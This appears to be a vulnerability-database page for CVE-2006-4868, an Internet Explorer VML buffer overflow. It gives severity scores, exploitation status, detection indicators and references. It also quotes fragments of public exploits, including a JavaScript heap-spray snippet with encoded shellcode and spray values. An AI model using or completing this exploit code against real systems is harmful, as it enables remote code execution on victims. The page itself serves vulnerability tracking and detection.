CVE-2006-4868
published 2006-09-19CVE-2006-4868: Stack-based buffer overflow in the Vector Graphics Rendering engine (vgx.dll), as used in Microsoft Outlook and Internet Explorer 6.0 on Windows XP SP2, and…
PriorityP273critical9.3CVSS 2.0
AVNACMAuNCCICAC
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
62.15%
99.1th percentile
Stack-based buffer overflow in the Vector Graphics Rendering engine (vgx.dll), as used in Microsoft Outlook and Internet Explorer 6.0 on Windows XP SP2, and possibly other versions, allows remote attackers to execute arbitrary code via a Vector Markup Language (VML) file with a long fill parameter within a rect tag.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft | outlook | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Exploit delivers a VML file with a long fill parameter inside a rect (or other VML shape) tag to overflow vgx.dll; look for abnormally large fill= attribute values in VML markup within HTML responses. ↗
- →Exploit HTML pages reference the VML behavior namespace binding 'url(#VMLRender)' or 'url(#default#VML)' in CSS; this pattern in HTTP responses is a strong indicator of CVE-2006-4868 exploitation attempts. ↗
- →Metasploit module uses a randomized VML element (rect, roundrect, line, polyline, oval, image, arc, curve) with a fill method overflow buffer composed of repeated Unicode escape sequences (&#xXXXX;) up to 65535 characters; detect oversized fill attributes in VML elements. ↗
- →The exploit payload file may be delivered as a Unicode (UTF-16 LE) HTML file starting with the BOM bytes 0xFF 0xFE; network detection should inspect for this magic number in HTTP responses serving HTML content. ↗
- →The Metasploit module targets User-Agent strings matching 'Windows 5.[123]' to select a larger overflow buffer (65535); anomalous buffer sizes correlated with specific UA strings can aid detection. ↗
- →The return address used in the heap-spray exploit is 0x0c0c0c0c (classic heap spray target); memory access violations or EIP values at 0x0c0c0c0c in iexplore.exe crash dumps indicate exploitation. ↗
- ·The Metasploit module randomizes the XML namespace prefix, JavaScript variable names, and whitespace in the exploit HTML, making static string-based signatures less reliable; behavioral or heuristic detection is preferred. ↗
- ·The overflow buffer length varies by target OS: 1024 Unicode chars for most targets, 65535 for Windows 5.x (XP/2003); signatures must account for both sizes. ↗
CVSS provenance
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-57hx-f9jp-528m: Stack-based buffer overflow in the Vector Graphics Rendering engine (vgx
ghsa_unreviewed·2022-05-01
CVE-2006-4868 [HIGH] CWE-119 GHSA-57hx-f9jp-528m: Stack-based buffer overflow in the Vector Graphics Rendering engine (vgx
Stack-based buffer overflow in the Vector Graphics Rendering engine (vgx.dll), as used in Microsoft Outlook and Internet Explorer 6.0 on Windows XP SP2, and possibly other versions, allows remote attackers to execute arbitrary code via a Vector Markup Language (VML) file with a long fill parameter within a rect tag.
VulnCheck
Microsoft Windows Improper Restriction of Operations within the Bounds of a Memory Buffer
vulncheck·2006·CVSS 9.3
CVE-2006-4868 [CRITICAL] Microsoft Windows Improper Restriction of Operations within the Bounds of a Memory Buffer
Microsoft Windows Improper Restriction of Operations within the Bounds of a Memory Buffer
Stack-based buffer overflow in the Vector Graphics Rendering engine (vgx.dll), as used in Microsoft Outlook and Internet Explorer 6.0 on Windows XP SP2, and possibly other versions, allows remote attackers to execute arbitrary code via a Vector Markup Language (VML) file with a long fill parameter within a rect tag.
Affected: Microsoft Windows
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://learn.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-055; https://betanews.com/2008/05/19/ten-thousand-servers-hit-in-sql-injection-hack/
No detection rules found.
Exploit-DB
Microsoft Internet Explorer - 'VML' Fill Method Code Execution (MS06-055) (Metasploit)
exploitdb·2010-07-03
CVE-2006-4868 Microsoft Internet Explorer - 'VML' Fill Method Code Execution (MS06-055) (Metasploit)
Microsoft Internet Explorer - 'VML' Fill Method Code Execution (MS06-055) (Metasploit)
---
##
# $Id: ms06_055_vml_method.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Internet Explorer VML Fill Method Code Execution',
'Description' => %q{
This module exploits a code execution vulnerability in Microsoft Internet Explorer using
a buffer overflow in the VML processing code (VGX.dll). This module has been tested on
Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.
},
'License' => MSF_LICENSE,
'Author'
Exploit-DB
Microsoft Internet Explorer - 'VML' Remote Buffer Overflow (SP2)
exploitdb·2006-09-25
CVE-2006-4868 Microsoft Internet Explorer - 'VML' Remote Buffer Overflow (SP2)
Microsoft Internet Explorer - 'VML' Remote Buffer Overflow (SP2)
---
#!/usr/bin/perl
#
# Microsoft Internet Explorer VML Remote Buffer Overflow (Windows XP SP2)
#
# Author: Trirat Puttaraksa (Kira)
#
# Credits: Niega
#
# [UPDATE Sep 24]
# At the first time, I decide to release this exploit on Oct 10.
# However, if u see this exploit before Oct 10, it is because of one
# of the following reason:
# 1. M$ release early than Oct 10 (may be impossible, lol)
# 2. there is someone already publish the exploit, so there is no means
# to still keep it private
# I'm already publish things about XP SP2 in my log :)
#
# http://sf-freedom.blogspot.com
#
###############################################################################
# For educational purpose only
#
# Note: This exploit is modified from
Exploit-DB
Microsoft Internet Explorer (Windows XP SP2) - 'VML' Remote Buffer Overflow
exploitdb·2006-09-24
CVE-2006-4868 Microsoft Internet Explorer (Windows XP SP2) - 'VML' Remote Buffer Overflow
Microsoft Internet Explorer (Windows XP SP2) - 'VML' Remote Buffer Overflow
---
v\:* { behavior: url(#VMLRender); }
var heapSprayToAddress = 0x05050505;
var payLoadCode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var heapBlockSize = 0x400000;
var payLoadSize = payLoadCode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("%u9090%u9090");
spraySlide = getSpraySlide(spra
Metasploit
MS06-055 Microsoft Internet Explorer VML Fill Method Code Execution
metasploit
MS06-055 Microsoft Internet Explorer VML Fill Method Code Execution
MS06-055 Microsoft Internet Explorer VML Fill Method Code Execution
This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the VML processing code (VGX.dll). This module has been tested on Windows 2000 SP4, Windows XP SP0, and Windows XP SP2.
No writeups or analysis indexed.
http://blogs.securiteam.com/index.php/archives/624http://secunia.com/advisories/21989http://securitytracker.com/id?1016879http://sunbeltblog.blogspot.com/2006/09/seen-in-wild-zero-day-exploit-being.htmlhttp://support.microsoft.com/kb/925486http://www.kb.cert.org/vuls/id/416092http://www.microsoft.com/technet/security/advisory/925568.mspxhttp://www.osvdb.org/28946http://www.securityfocus.com/archive/1/446378/100/0/threadedhttp://www.securityfocus.com/archive/1/446505/100/0/threadedhttp://www.securityfocus.com/archive/1/446523/100/0/threadedhttp://www.securityfocus.com/archive/1/446528/100/0/threadedhttp://www.securityfocus.com/archive/1/446881/100/200/threadedhttp://www.securityfocus.com/archive/1/447070/100/0/threadedhttp://www.securityfocus.com/archive/1/448552/100/0/threadedhttp://www.securityfocus.com/bid/20096http://www.us-cert.gov/cas/techalerts/TA06-262A.htmlhttp://www.vupen.com/english/advisories/2006/3679https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-055https://exchange.xforce.ibmcloud.com/vulnerabilities/29004https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A100http://blogs.securiteam.com/index.php/archives/624http://secunia.com/advisories/21989http://securitytracker.com/id?1016879http://sunbeltblog.blogspot.com/2006/09/seen-in-wild-zero-day-exploit-being.htmlhttp://support.microsoft.com/kb/925486http://www.kb.cert.org/vuls/id/416092http://www.microsoft.com/technet/security/advisory/925568.mspxhttp://www.osvdb.org/28946http://www.securityfocus.com/archive/1/446378/100/0/threadedhttp://www.securityfocus.com/archive/1/446505/100/0/threadedhttp://www.securityfocus.com/archive/1/446523/100/0/threadedhttp://www.securityfocus.com/archive/1/446528/100/0/threadedhttp://www.securityfocus.com/archive/1/446881/100/200/threadedhttp://www.securityfocus.com/archive/1/447070/100/0/threadedhttp://www.securityfocus.com/archive/1/448552/100/0/threadedhttp://www.securityfocus.com/bid/20096http://www.us-cert.gov/cas/techalerts/TA06-262A.htmlhttp://www.vupen.com/english/advisories/2006/3679https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-055https://exchange.xforce.ibmcloud.com/vulnerabilities/29004https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A100
2006-09-19
Published
Exploited in the wild